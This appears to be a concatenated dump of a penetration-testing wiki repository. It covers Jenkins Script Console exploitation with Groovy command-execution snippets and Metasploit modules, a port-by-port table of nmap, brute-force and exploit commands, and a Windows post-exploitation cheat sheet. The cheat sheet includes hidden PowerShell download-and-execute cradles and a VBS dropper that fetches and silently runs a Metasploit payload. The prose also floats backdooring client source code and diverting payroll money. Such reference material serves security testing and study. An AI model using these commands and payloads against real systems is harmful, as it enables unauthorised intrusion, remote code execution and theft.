Jenkins Hacking 5 | 6 | 1. How to deploy jenkins ? 7 | 2. How to exploit jenkins server ? 8 | 9 | 10 | Jenkins is a self-contained, open source automation server which can be used to automate all sorts of tasks such as building, testing, and deploying software. Jenkins can be installed through native system packages, Docker, or even run standalone by any machine with the Java Runtime Environment installed. 11 | 12 | 13 | ## How to deploy jenkins ? 14 | 15 | This guided tour will use the "standalone" Jenkins distribution which requires a minimum of Java 7, though Java 8 is recommended. A system with more than 512MB of RAM is also recommended. 16 | 17 | 1. [Download Jenkins](http://mirrors.jenkins.io/war-stable/latest/jenkins.war). 18 | 2. Open up a terminal in the download directory and run java -jar jenkins.war 19 | 3. Browse to http://localhost:8080 and follow the instructions to complete the installation. 20 | 4. Many Pipeline examples require an installed Docker on the same computer as Jenkins. 21 | 22 | Please check the install log as follow. 23 | 24 | ``` 25 | root@lab:~/Downloads# java -jar jenkins.war 26 | Running from: /root/Downloads/jenkins.war 27 | webroot: $user.home/.jenkins 28 | Mar 15, 2017 5:03:49 AM Main deleteWinstoneTempContents 29 | WARNING: Failed to delete the temporary Winstone file /tmp/winstone/jenkins.war 30 | Mar 15, 2017 5:03:50 AM org.eclipse.jetty.util.log.JavaUtilLog info 31 | INFO: Logging initialized @6168ms 32 | Mar 15, 2017 5:03:50 AM winstone.Logger logInternal 33 | INFO: Beginning extraction from war file 34 | Mar 15, 2017 5:04:05 AM org.eclipse.jetty.util.log.JavaUtilLog warn 35 | WARNING: Empty contextPath 36 | Mar 15, 2017 5:04:06 AM org.eclipse.jetty.util.log.JavaUtilLog info 37 | INFO: jetty-9.2.z-SNAPSHOT 38 | Mar 15, 2017 5:04:10 AM org.eclipse.jetty.util.log.JavaUtilLog info 39 | INFO: NO JSP Support for /, did not find org.eclipse.jetty.jsp.JettyJspServlet 40 | Jenkins home directory: /root/.jenkins found at: $user.home/.jenkins 41 | Mar 15, 2017 5:04:20 AM org.eclipse.jetty.util.log.JavaUtilLog info 42 | INFO: Started w.@30990c1b{/,file:/root/.jenkins/war/,AVAILABLE}{/root/.jenkins/war} 43 | Mar 15, 2017 5:04:20 AM org.eclipse.jetty.util.log.JavaUtilLog info 44 | INFO: Started ServerConnector@54227100{HTTP/1.1}{0.0.0.0:8080} 45 | Mar 15, 2017 5:04:20 AM org.eclipse.jetty.util.log.JavaUtilLog info 46 | INFO: Started @36602ms 47 | Mar 15, 2017 5:04:20 AM winstone.Logger logInternal 48 | INFO: Winstone Servlet Engine v2.0 running: controlPort=disabled 49 | Mar 15, 2017 5:04:22 AM jenkins.InitReactorRunner$1 onAttained 50 | INFO: Started initialization 51 | Mar 15, 2017 5:04:23 AM jenkins.InitReactorRunner$1 onAttained 52 | INFO: Listed all plugins 53 | Mar 15, 2017 5:04:45 AM jenkins.InitReactorRunner$1 onAttained 54 | INFO: Prepared all plugins 55 | Mar 15, 2017 5:04:45 AM jenkins.InitReactorRunner$1 onAttained 56 | INFO: Started all plugins 57 | Mar 15, 2017 5:04:45 AM jenkins.InitReactorRunner$1 onAttained 58 | INFO: Augmented all extensions 59 | Mar 15, 2017 5:04:51 AM jenkins.InitReactorRunner$1 onAttained 60 | INFO: Loaded all jobs 61 | Mar 15, 2017 5:04:51 AM hudson.model.AsyncPeriodicWork$1 run 62 | INFO: Started Download metadata 63 | Mar 15, 2017 5:04:52 AM org.jenkinsci.main.modules.sshd.SSHD start 64 | INFO: Started SSHD at port 43731 65 | Mar 15, 2017 5:04:53 AM jenkins.InitReactorRunner$1 onAttained 66 | INFO: Completed initialization 67 | Mar 15, 2017 5:04:55 AM org.springframework.context.support.AbstractApplicationContext prepareRefresh 68 | INFO: Refreshing org.springframework.web.context.support.StaticWebApplicationContext@4d8c4701: display name [Root WebApplicationContext]; startup date [Wed Mar 15 05:04:55 EDT 2017]; root of context hierarchy 69 | Mar 15, 2017 5:04:55 AM org.springframework.context.support.AbstractApplicationContext obtainFreshBeanFactory 70 | INFO: Bean factory for application context [org.springframework.web.context.support.StaticWebApplicationContext@4d8c4701]: org.springframework.beans.factory.support.DefaultListableBeanFactory@16f7f485 71 | Mar 15, 2017 5:04:55 AM org.springframework.beans.factory.support.DefaultListableBeanFactory preInstantiateSingletons 72 | INFO: Pre-instantiating singletons in org.springframework.beans.factory.support.DefaultListableBeanFactory@16f7f485: defining beans [authenticationManager]; root of factory hierarchy 73 | Mar 15, 2017 5:04:58 AM org.springframework.context.support.AbstractApplicationContext prepareRefresh 74 | INFO: Refreshing org.springframework.web.context.support.StaticWebApplicationContext@1aa6a1d4: display name [Root WebApplicationContext]; startup date [Wed Mar 15 05:04:58 EDT 2017]; root of context hierarchy 75 | Mar 15, 2017 5:04:58 AM org.springframework.context.support.AbstractApplicationContext obtainFreshBeanFactory 76 | INFO: Bean factory for application context [org.springframework.web.context.support.StaticWebApplicationContext@1aa6a1d4]: org.springframework.beans.factory.support.DefaultListableBeanFactory@26dbd965 77 | Mar 15, 2017 5:04:58 AM org.springframework.beans.factory.support.DefaultListableBeanFactory preInstantiateSingletons 78 | INFO: Pre-instantiating singletons in org.springframework.beans.factory.support.DefaultListableBeanFactory@26dbd965: defining beans [filter,legacy]; root of factory hierarchy 79 | Mar 15, 2017 5:04:59 AM jenkins.install.SetupWizard init 80 | INFO: 81 | 82 | ************************************************************* 83 | ************************************************************* 84 | ************************************************************* 85 | 86 | Jenkins initial setup is required. An admin user has been created and a password generated. 87 | Please use the following password to proceed to installation: 88 | 89 | e019dca34bac4a30beca67b53e821f35 90 | 91 | This may also be found at: /root/.jenkins/secrets/initialAdminPassword 92 | 93 | ************************************************************* 94 | ************************************************************* 95 | ************************************************************* 96 | 97 | Mar 15, 2017 5:05:06 AM hudson.model.UpdateSite updateData 98 | INFO: Obtained the latest update center data file for UpdateSource default 99 | Mar 15, 2017 5:05:09 AM hudson.model.DownloadService$Downloadable load 100 | INFO: Obtained the updated data file for hudson.tasks.Maven.MavenInstaller 101 | Mar 15, 2017 5:05:09 AM hudson.model.UpdateSite updateData 102 | INFO: Obtained the latest update center data file for UpdateSource default 103 | Mar 15, 2017 5:05:10 AM hudson.WebAppMain$3 run 104 | INFO: Jenkins is fully up and running 105 | Mar 15, 2017 5:05:10 AM javax.jmdns.impl.HostInfo newHostInfo 106 | WARNING: Could not intialize the host network interface on nullbecause of an error: lab: lab: Temporary failure in name resolution 107 | java.net.UnknownHostException: lab: lab: Temporary failure in name resolution 108 | at java.net.InetAddress.getLocalHost(InetAddress.java:1505) 109 | at javax.jmdns.impl.HostInfo.newHostInfo(HostInfo.java:75) 110 | at javax.jmdns.impl.JmDNSImpl.(JmDNSImpl.java:407) 111 | at javax.jmdns.JmDNS.create(JmDNS.java:60) 112 | at hudson.DNSMultiCast$1.call(DNSMultiCast.java:33) 113 | at jenkins.util.ContextResettingExecutorService$2.call(ContextResettingExecutorService.java:46) 114 | at java.util.concurrent.FutureTask.run(FutureTask.java:266) 115 | at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142) 116 | at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617) 117 | at java.lang.Thread.run(Thread.java:745) 118 | Caused by: java.net.UnknownHostException: lab: Temporary failure in name resolution 119 | at java.net.Inet6AddressImpl.lookupAllHostAddr(Native Method) 120 | at java.net.InetAddress$2.lookupAllHostAddr(InetAddress.java:928) 121 | at java.net.InetAddress.getAddressesFromNameService(InetAddress.java:1323) 122 | at java.net.InetAddress.getLocalHost(InetAddress.java:1500) 123 | ... 9 more 124 | 125 | Mar 15, 2017 5:05:18 AM hudson.model.DownloadService$Downloadable load 126 | INFO: Obtained the updated data file for hudson.tools.JDKInstaller 127 | Mar 15, 2017 5:05:18 AM hudson.model.AsyncPeriodicWork$1 run 128 | INFO: Finished Download metadata. 27,508 ms 129 | 130 | 131 | ``` 132 | 133 | Please attention here, we need the password to finish setup. 134 | 135 | ``` 136 | Jenkins initial setup is required. An admin user has been created and a password generated. 137 | Please use the following password to proceed to installation: 138 | 139 | e019dca34bac4a30beca67b53e821f35 140 | ``` 141 | 142 | ## How to exploit jenkins server ? 143 | 144 | access http://127.0.0.1:8080/script, and pwn the jenkins server with Script Console. 145 | 146 | > Script Console 147 | 148 | > Type in an arbitrary Groovy script and execute it on the server. Useful for trouble-shooting and diagnostics. Use the ‘println’ command to see the output (if you use System.out, it will go to the server’s stdout, which is harder to see.) Example: 149 | 150 | 151 | ### **execmd.groovy** 152 | 153 | **execmd.groovy** can help you execute os command on jenkins server. 154 | 155 | ``` 156 | # Windows 157 | 158 | println "cmd.exe /c dir".execute().text 159 | 160 | 161 | # Linux 162 | 163 | println "uname -a".execute().text 164 | 165 | ``` 166 | 167 | ### **writefile.groovy** 168 | 169 | **writefile.groovy** can write strings into a file on jenkins server. 170 | 171 | ``` 172 | new File("/tmp/test.sh").write(""" 173 | echo "123" 174 | echo "456" 175 | """) 176 | ``` 177 | 178 | If you prefer [metasploit-framework](https://github.com/rapid7/metasploit-framework), 179 | 180 | ``` 181 | msf > use exploit/multi/http/jenkins_script_console 182 | msf exploit(jenkins_script_console) > show options 183 | 184 | Module options (exploit/multi/http/jenkins_script_console): 185 | 186 | Name Current Setting Required Description 187 | ---- --------------- -------- ----------- 188 | PASSWORD password no The password for the specified username 189 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 190 | RHOST 192.168.1.100 yes The target address 191 | RPORT 8080 yes The target port 192 | TARGETURI / yes The path to jenkins 193 | USERNAME test no The username to authenticate as 194 | VHOST no HTTP server virtual host 195 | 196 | 197 | Exploit target: 198 | 199 | Id Name 200 | -- ---- 201 | 1 Linux 202 | msf exploit(jenkins_script_console) > exploit 203 | ``` 204 | 205 | 206 | ## References 207 | 208 | 1. https://jenkins.io/ 209 | -------------------------------------------------------------------------------- /2.Vulnerability-Assessment/Network-Assessment/Jenkins/execmd.groovy: -------------------------------------------------------------------------------- 1 | # Windows 2 | 3 | println "cmd.exe /c dir".execute().text 4 | 5 | 6 | # Linux 7 | 8 | println "uname -a".execute().text 9 | -------------------------------------------------------------------------------- /2.Vulnerability-Assessment/Network-Assessment/Jenkins/writefile.groovy: -------------------------------------------------------------------------------- 1 | new File("/tmp/test.sh").write(""" 2 | echo "123" 3 | echo "456" 4 | """) 5 | -------------------------------------------------------------------------------- /2.Vulnerability-Assessment/OS-Assessment/OSX/README.md: -------------------------------------------------------------------------------- 1 | **Authors**: < [nixawk](https://github.com/nixawk) > 2 | 3 | ## OSX Security 4 | 5 | 1. [macOS-Security-and-Privacy-Guide](https://github.com/drduh/macOS-Security-and-Privacy-Guide) 6 | 2. [mOSL](https://github.com/0xmachos/mOSL) 7 | -------------------------------------------------------------------------------- /2.Vulnerability-Assessment/README.md: -------------------------------------------------------------------------------- 1 | **Authors**: < [nixawk](https://github.com/nixawk) >, < [sjas](https://github.com/sjas) > 2 | 3 | ---- 4 | 5 | # Vulnerability Assessment 6 | 7 | Having identified the most viable attack methods, you need to consider how you will access the target. During vulnerability analysis, you combine the information that you’ve learned from the prior phases and use it to understand what attacks might be viable. Among other things, vulnerability analysis takes into account port and vulnerability scans, data gathered by banner grabbing, and information collected during intelligence gathering. 8 | 9 | |**Assessment Categroy**|**Bookmarks**| 10 | |:----------------------|:------------| 11 | |Network Assessment || 12 | |Web Application Assessment|| 13 | |Database Assessment|| 14 | 15 | 16 | # Links 17 | 18 | 1. http://www.exploit-db.com/ 19 | 2. http://www.cvedetails.com/ 20 | 3. http://packetstormsecurity.com/ 21 | 4. http://www.securityfocus.com/bid 22 | 5. http://nvd.nist.gov/ 23 | 6. http://osvdb.org/ 24 | 7. http://cve.mitre.org/ 25 | 8. http://sec.jetlib.com/ 26 | 9. http://0day.today/ 27 | 10. https://www.seebug.org/ 28 | 11. https://www.rapid7.com/db/ 29 | 12. http://zerodayinitiative.com/advisories/published/ 30 | 13. http://exploitsearch.net/ 31 | 14. http://nvd.nist.gov/download/nvd-rss-analyzed.xml 32 | 15. http://www.intelligentexploit.com/ 33 | 16. https://wpvulndb.com/ 34 | 17. http://www.wordpressexploit.com/ 35 | 18. http://www.drupalexploit.com/ 36 | 19. http://www.openwall.com/lists/oss-security/ 37 | 20. http://exploitsearch.net/ 38 | 21. https://www.vulnerability-lab.com/ 39 | -------------------------------------------------------------------------------- /3.Exploitation-Tools/Network-Exploitation/ports_number.md: -------------------------------------------------------------------------------- 1 | **Authors**: < [nixawk](https://github.com/nixawk) > 2 | 3 | ---- 4 | 5 | # Ports 6 | 7 | |**Port Number**|**Protocol**|**Service & Application**|**Commands**| 8 | |:--------------|:-----------|:------------------------|:-----------| 9 | |1|tcp|blackice|| 10 | |7|tcp|echo|| 11 | |11|tcp|systat|| 12 | |13|tcp|daytime|| 13 | |15|tcp|netstat|| 14 | |17|tcp|quote of the day|| 15 | |19|tcp|character generator|| 16 | |21|tcp|ftp|nmap --script ftp-anon `target`|| 17 | |22|tcp|ssh|msf > use auxiliary/scanner/ssh/ssh_login
nmap --script ssh2-enum-algos 192.168.108.197
nmap --script ssh-hostkey 192.168.108.197
nmap --script sshv1 192.168.108.197| 18 | |23|tcp|telnet|msf > use auxiliary/scanner/telnet/telnet_login
nmap -p 23 --script telnet-brute --script-args userdb=myusers.lst,passdb=mypwds.lst,telnet-brute.timeout=8s `target`
nmap -p 23 --script telnet-encryption `target`
nmap -p 23 --script telnet-ntlm-info `target`| 19 | |25|tcp|smtp|nmap -p 25 --script smtp-brute `target`
nmap --script smtp-commands.nse [--script-args smtp-commands.domain=`domain`] -pT:25,465,587 `target`
nmap -p 25,465,587 --script smtp-ntlm-info --script-args smtp-ntlm-info.domain=domain.com `target`
nmap --script smtp-open-relay.nse [--script-args smtp-open-relay.domain=`domain`,smtp-open-relay.ip=`address`,...] -p 25,465,587 `target`
nmap --script=smtp-vuln-cve2010-4344 --script-args="smtp-vuln-cve2010-4344.exploit" -pT:25,465,587 `target`
nmap --script=smtp-vuln-cve2010-4344 --script-args="exploit.cmd='uname -a'" -pT:25,465,587 `target`
nmap --script=smtp-vuln-cve2011-1720 --script-args='smtp.domain=`domain`' -pT:25,465,587 `target`
nmap --script=smtp-vuln-cve2011-1764 -pT:25,465,587 `target`| 20 | |26|tcp|ssh|| 21 | |37|tcp|rdate|| 22 | |49|tcp|TACACS+|| 23 | |53|tcp|dns|| 24 | |53|udp|dns|| 25 | |67|tcp|DHCP|| 26 | |68|tcp|dhclient|| 27 | |69|udp|TFTP,BitTorrent|| 28 | |70|tcp|Gopher|| 29 | |79|tcp|Finger|| 30 | |80|tcp|HTTP,malware|| 31 | |81|tcp|HTTP,malware|| 32 | |82|tcp|HTTP,malware|| 33 | |83|tcp|HTTP|| 34 | |84|tcp|HTTP|| 35 | |88|tcp|Kerberos|use auxiliary/admin/kerberos/ms14_068_kerberos_checksum| 36 | |102|tcp|Siemens S7|| 37 | |110|tcp|pop3|| 38 | |111|tcp|RPC|rpcinfo -p 192.168.1.111
msf >use auxiliary/scanner/nfs/nfsmount| 39 | |119|tcp|NNTP|| 40 | |123|tcp|NTP|| 41 | |123|udp|ntp|ntpdc -n -c monlist `target`
nmap -sU -p 123 -Pn -n --script ntp-info `target`
nmap -sU -p 123 -Pn -n --script ntp-monlist `target`
msf > use auxiliary/scanner/ntp/ntp_readvar| 42 | |137|tcp|NetBIOS|nbtscan -A `target`| 43 | |143|tcp|IMAP|| 44 | |161|udp|snmp|snmpcheck -p 161 -c public -t `target`
snmpwalk -v1 -c public `target`
msf > use auxiliary/scanner/snmp/snmp_enum| 45 | |175|tcp|IBM Network Job Entry|| 46 | |179|tcp|BGP|| 47 | |195|tcp|TA14-353a|| 48 | |311|tcp|OS X Server Manager|| 49 | |389|tcp|ldap|ldap://`target`/dc=com| 50 | |443|tcp|https|openssl s_client -host www.yahoo.com -port 443
sslscan www.yahoo.com
tlssled www.yahoo.com 443
nmap --script sslv2 www.yahoo.com
nmap --script ssl-cert www.yahoo.com
nmap --script ssl-date www.yahoo.com
nmap --script ssl-enum-ciphers www.yahoo.com
nmap --script ssl-google-cert-catalog www.yahoo.com
msf > use auxiliary/pro/web_ssl_scan
msf > use auxiliary/scanner/ssl/openssl_heartbleed
msf > use auxiliary/server/openssl_heartbeat_client_memory| 51 | |445|tcp|Microsoft-DS Active Directory, Windows shares
Microsoft-DS SMB file sharing|smbclient -U root -L `target`
smbclient -U root //`target`/tmp
rpcclient -U "" `target`
msf > auxiliary/admin/smb/samba_symlink_traversal| 52 | |465|tcp|smtps|| 53 | |500|udp|ike|| 54 | |502|tcp|modbus|| 55 | |503|tcp|modbus|| 56 | |512|tcp||| 57 | |513|tcp||| 58 | |514|tcp||| 59 | |515|tcp|Line Printer Daemon|| 60 | |520|tcp|RIP|| 61 | |523|tcp|IBM DB2|| 62 | |554|tcp|RTSP|| 63 | |587|tcp|SMTP mail submission|| 64 | |623|tcp|IPMI|| 65 | |626|tcp|OS X serialnumbered|| 66 | |631|tcp|CUPS Service error|| 67 | |636|tcp|ldaps|| 68 | |771|tcp|Realport|| 69 | |789|tcp|Redlion Crimson3|| 70 | |873|tcp|rsync|rsync -a user@host::tools/
nmap -p 873 --script rsync-brute --script-args 'rsync-brute.module=www' `target`
nmap -p 873 --script rsync-list-modules `target`
msf >use auxiliary/scanner/rsync/modules_list| 71 | |902|tcp|VMware authentication|| 72 | |992|tcp|Telnet(secure)|| 73 | |993|tcp|IMAPs|| 74 | |995|tcp|POP3s|| 75 | |1023|tcp|telnet|| 76 | |1025|tcp|Kamstrup|| 77 | |1099|tcp|Remote Method invocation|use exploit/multi/misc/java_rmi_server| 78 | |1194|tcp|openvpn|| 79 | |1200|tcp|Codesys|| 80 | |1234|udp|udpxy|| 81 | |1202|tcp|linknat|| 82 | |1434|udp|MS-SQL monitor|| 83 | |1604||Citrix, malware|| 84 | |1723|tcp|pptp|thc-pptp-bruter -v -u `username` -n 4 `target` < pass.txt| 85 | |1741||CiscoWorks|| 86 | |1833||MQTT|| 87 | |1900|tcp|bes,UPnP|| 88 | |1911||Niagara Fox|| 89 | |1962||PCworx|| 90 | |2000||iKettle,MikroTik bandwidth test|| 91 | |2049|tcp|nfs|showmount --all `target`
showmount --exports `target`
mount -t nfs `target`:/ /mnt/nfs/| 92 | |2121|tcp|ftp|msf > use auxiliary/scanner/ftp/ftp_login| 93 | |2082|tcp|cpanel|| 94 | |2083|tcp|cpanel|| 95 | |2086||WHM|| 96 | |2087||WHM|| 97 | |2123||GTPv1|| 98 | |2152||GTPv1|| 99 | |2182||Apache Zookeeper|| 100 | |2222|tcp|SSH, PLC5, EtherNet/IP|| 101 | |2323|tcp|telnet|| 102 | |2332|tcp|Sierra wireless(telnet)|| 103 | |2375||Docker|| 104 | |2376||Docker|| 105 | |2404||IEC-104|| 106 | |2455||CoDeSys|| 107 | |2480||OrientDB|| 108 | |2628||Dictionary|| 109 | |3000||ntop|| 110 | |3128|tcp|squid|| 111 | |3299|tcp|sap|msf > use auxiliary/scanner/sap/sap_router_portscanner| 112 | |3306|tcp|mysql|msf > auxiliary/scanner/mysql/mysql_login
nmap --script mysql-brute `target`
nmap --script mysql-databases `target`
nmap -p 3306 --script mysql-dump-hashes `target`
--script-args='username=`username`,password=`password`' `target`
nmap -p 3306 --script mysql-enum `target`
nmap -p 3306 --script mysql-users `target`
nmap -p 3306 --script mysql-query --script-args='query="`query`"[,username=`username`,password=`password`] `target`'| 113 | |3310|tcp|ClamAV|| 114 | |3386||GTPv1|| 115 | |3388||RDP|| 116 | |3389||RDP|| 117 | |3541||PBX GUI|| 118 | |3542||PBX GUI|| 119 | |3632|tcp|distccd|msf > use exploit/unix/misc/distcc_exec | 120 | |3689||DACP|| 121 | |3780||Metasploit|| 122 | |3787||Ventrilo|| 123 | |4022||udpxy|| 124 | |4369|tcp|Erlang Port Mapper Daemon|nmap -p 4369 --script epmd-info `target`| 125 | |4440|tcp|rundeck|| 126 | |4500||IKE NAT-T(VPN)|| 127 | |4567||Modem web interface|| 128 | |4070||VertX/Edge door controller|| 129 | |4800||Noxa Nport|| 130 | |4911||Niagara Fox with SSL|| 131 | |4949||Munin|| 132 | |5006||MELSEC-Q|| 133 | |5007||MELSEC-Q|| 134 | |5008||NetMobility|| 135 | |5009||Apple Aitport Administrator|| 136 | |5038|tcp|Asterisk Call Manager|http://code.google.com/p/sipvicious/

$ ncat -v 192.168.108.196 5038
Ncat: Version 6.47 ( http://nmap.org/ncat )
Ncat: Connected to 192.168.108.196:5038.
Asterisk Call Manager/1.1
action: login
username: admin
secret: amp111

Response: Success
Message: Authentication accepted
action: command
command: core show help| 137 | |5432|tcp|postgresql|| 138 | |5060|udp|sip|msf > use auxiliary/scanner/sip/options| 139 | |5222||XMPP|| 140 | |5269||XMPP Server to Server|| 141 | |5353||mDNS|| 142 | |5357||Mirosoft-HTTP API/2.0|| 143 | |5432||Postgresql|| 144 | |5555|tcp|hp data protector|msf > use exploit/windows/misc/hp_dataprotector_cmd_exec| 145 | |5577||Flux LED|| 146 | |5601|tcp|kibana|| 147 | |5632||PCAnywhere|| 148 | |5672||RabbitMQ|| 149 | |5900|tcp|vnc|msf > use auxiliary/scanner/vnc/vnc_none_auth
msf > use auxiliary/scanner/vnc/vnc_login
msf > use exploit/multi/vnc/vnc_keyboard_exec
nmap --script vnc-brute -p 5900
nmap --script vnc-info -p 5900 | 150 | |5901||vnc|| 151 | |5938||TeamViewer|| 152 | |5984||CouchDB|| 153 | |5985|tcp|winrm|msf >use exploit/windows/winrm/winrm_script_exec
msf >use auxiliary/scanner/winrm/winrm_auth_methods
msf >use auxiliary/scanner/winrm/winrm_cmd
msf >use auxiliary/scanner/winrm/winrm_login
msf >use auxiliary/scanner/winrm/winrm_wql| 154 | |6000|tcp|x11|xwd -root -screen -slient -display 192.168.1.108:0 > out.xwd
convert out.xwd out.png| 155 | |6379|tcp|redis|redis-cli -h 127.0.0.1 -p 6379
msf >use auxiliary/scanner/redis/file_upload
msf >use auxiliary/scanner/redis/redis_login
use auxiliary/scanner/redis/redis_server| 156 | |6380|tcp|redis|| 157 | |6082|tcp|varnish|| 158 | |6667|tcp|ircd backdoor|msf > use exploit/unix/irc/unreal_ircd_3281_backdoor| 159 | |6881||BitTorrent|| 160 | |6969||TFTP,BitTorrent|| 161 | |7001|tcp|weblogic|| 162 | |8080|tcp|jekins|Jekins Console
println "cmd.exe /c dir".execute().text

msf >use auxiliary/scanner/http/jenkins_enum
msf >use exploit/multi/http/jenkins_script_console| 163 | |8083|tcp|vestacp|| 164 | |8089|tcp|jboss|| 165 | |8101|tcp|apache karaf|| 166 | |8180|tcp|apache tomcat|msf > use exploit/multi/http/tomcat_mgr_deploy| 167 | |8443|tcp|https|| 168 | |8554|tcp|rtsp|| 169 | |8649|tcp|ganglia|| 170 | |9009|tcp|Julia|| 171 | |9151|tcp|Tor Control|| 172 | |9160||Apache Cassandra|| 173 | |9200|tcp|elasticsearch|msf >use exploit/multi/elasticsearch/search_groovy_script| 174 | |9418|tcp|git|| 175 | |10000|tcp|virtualmin/webmin|| 176 | |11211|tcp|memcache|msf > use auxiliary/gather/memcached_extractor
$ nc x.x.x.x 11211
stats\r\n| 177 | |13579||Media Player classic web interface|| 178 | |15672|tcp|rabbitmq|http login - guest/guest| 179 | |17185||VxWorks WDBRPC|| 180 | |18083|tcp|vbox server|| 181 | |27017|tcp|mongodb|msf >use auxiliary/scanner/mongodb/mongodb_login
$ mongo host:port/database
MongoDB shell version: 2.6.12
> help| 182 | |28017|tcp|mongodb|| 183 | |37777||Dahua DVR|| 184 | |44818||EtherNet/IP|| 185 | |49153||WeMo Link|| 186 | |50000|tcp|sap|| 187 | |50030|tcp|hadoop|| 188 | |50070|tcp|hadoop|| 189 | |51106||Deluge(HTTP)|| 190 | |54138||Toshiba PoS|| 191 | |55553||Metasploit|| 192 | |55554||Metasploit|| 193 | |62078||Apple iDevice|| 194 | |64738||Mumble|| 195 | 196 | # Links 197 | 198 | 1. http://www.rfc-editor.org/search/rfc_search.php 199 | 2. http://packetlife.net/ 200 | 3. https://www.leanpub.com/shodan 201 | -------------------------------------------------------------------------------- /4.Post-Exploitation/README.md: -------------------------------------------------------------------------------- 1 | **Authors**: < [nixawk](https://github.com/nixawk) > 2 | 3 | ---- 4 | 5 | # Post Exploitation - Windows 6 | 7 | Post exploitation is a critical component in any penetration test. This is where you differentiate yourself from the average, run-of-the-mill hacker and actually provide valuable information and intelligence from your penetration test. Post exploitation targets specific systems, identifies critical infrastructure, and targets information or data that the company values most and that it has attempted to secure. When you exploit one system after another, you are try- ing to demonstrate attacks that would have the greatest business impact. 8 | 9 | When attacking systems in `post exploitation`, you should take the time to determine what the various systems do and their different user roles. For example, suppose you compromise a domain infrastructure system and you’re running as an enterprise administrator or have domain administrative-level rights. You might be king of the domain, but what about the systems that communicate with Active Directory? What about the main financial applica- tion that is used to pay employees? Could you compromise that system, and then, on the next pay cycle, have it route all the money out of the company to an offshore account? How about the target’s intellectual property? 10 | 11 | Suppose, for example, that your client is a large software development shop that ships custom-coded applications to customers for use in manufac- turing environments. Can you backdoor their source code and essentially compromise all of their customers? What would that do to harm their brand credibility? 12 | 13 | `Post exploitation` is one of those tricky scenarios in which you must take the time to learn what information is available to you and then use that infor- mation to your benefit. An attacker would generally spend a significant amount of time in a compromised system doing the same. Think like a malicious attacker—be creative, adapt quickly, and rely on your wits instead of auto- mated tools. 14 | 15 | ## Remote Management 16 | 17 | |**Command**|**Description**| 18 | |:----------|:--------------| 19 | |NET USE \\\\`ip`\ipc$ `password` /user:`username`|Make a ipc connection with remote service, if successful, you can try to view, query, .... with the right privilege.| 20 | |NET USE z: \\\\`ip`\\`share`$ `password` /user:`username`|Map remote share as local drive z:| 21 | |systeminfo /S `ComputerName` /U `username` /P `password`|This tool displays operating system configuration information for a local or remote machine, including service pack levels.| 22 | |tasklist /S `SERVER` /U `DOMAIN\username` /P `password`|displays a list of currently running processes on remote machine.| 23 | |taskkill /S `SERVER` /U `DOMAIN\username` /P `password`|kill an process in remote server.| 24 | |powershell.exe -w hidden -nop -ep bypass -c "IEX ((new-object net.webclient).downloadstring('http://ip:port/[file]'))"|Execute code from remote server.| 25 | |powershell.exe -w hidden -nop -ep bypass -c "(new-object net.webclient).DownloadFile('http://ip:port/file', 'C:\Windows\temp\testfile')"|Download a file from remote server.| 26 | |powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File test.ps1|Execute `test.ps1` on localhost| 27 | |bitsadmin /transfer `systemrepair` /download /priority `normal` http://path/to/file c:\path\local\file|Create a job called `systemrepair` to download a file from remote server.| 28 | |echo strUrl = WScript.Arguments.Item(0):StrFile = WScript.Arguments.Item(1):Set Post = CreateObject(^"Msxml2.XMLHTTP^"):Set Shell = CreateObject(^"Wscript.Shell^"):Post.Open ^"GET^",strUrl,0:Post.Send():Set aGet = CreateObject(^"ADODB.Stream^"):aGet.Mode = 3:aGet.Type = 1:aGet.Open():aGet.Write(Post.responseBody):aGet.SaveToFile StrFile,2 > wget.vbs

`cscript.exe wget.vbs http://ip:port/filename C:\Windows\temp\filename`|Download File with vbs| 29 | |echo strFileURL = WScript.Arguments.Item(0):Set objXMLHTTP = CreateObject(^"MSXML2.XMLHTTP^"):objXMLHTTP.open ^"GET^", strFileURL, false:objXMLHTTP.send():shellcode = objXMLHTTP.responseText:strXML = ^"^^" ^& shellcode ^& ^"^<^/B64DECODE^>^":Set oXMLDoc = CreateObject(^"MSXML2.DOMDocument.3.0^"):oXMLDoc.LoadXML(strXML):decode = oXMLDoc.selectsinglenode(^"B64DECODE^").nodeTypedValue:set oXMLDoc = nothing:Dim fso:Set fso = CreateObject(^"Scripting.FileSystemObject^"):Dim tempdir:Dim basedir:Set tempdir = fso.GetSpecialFolder(2):basedir = tempdir ^& ^"\^" ^& fso.GetTempName():fso.CreateFolder(basedir):tempexe = basedir ^& ^"\^" ^& ^"test.exe^":Dim adodbstream:Set adodbstream = CreateObject(^"ADODB.Stream^"):adodbstream.Type = 1:adodbstream.Open:adodbstream.Write decode:adodbstream.SaveToFile tempexe, 2:Dim wshell:Set wshell = CreateObject(^"Wscript.Shell^"):wshell.run tempexe, 0, true:fso.DeleteFile(tempexe):fso.DeleteFolder(basedir):Set fso = Nothing > %TEMP%\msf.vbs

`cscript.exe %TEMP%\msf.vbs http://ip:port/vbspayload.txt`|Dwonload and exec metasploit vbs payload.| 30 | |PsExec.exe \\\\192.168.206.145 -accepteula -u `username` -p `password` `cmd.exe /c ver`|Run remote windows commands, and return results| 31 | |wmic /node:`SERVER` /user:`DOMAIN\username` /password:`password` process call create "cmd /c vssadmin list shadows 2>&1 > c:\temp\output.txt"|Create a new process on remote server. No command results return.| 32 | 33 | 34 | ## PROXY 35 | 36 | |**Command**|**Description**| 37 | |:----------|:--------------| 38 | |NETSH INTERFACE portproxy add v4tov4 listenport=`LPORT` connectaddress=`RHOST` connectport=`RPORT` [listenaddress=`LHOST` protocol=tcp]|Transmit data from localport to remoteaddr:remoteport.| 39 | |set http_proxy=http://your_proxy:your_port
set http_proxy=http://username:password@your_proxy:your_port
set https_proxy=https://your_proxy:your_port
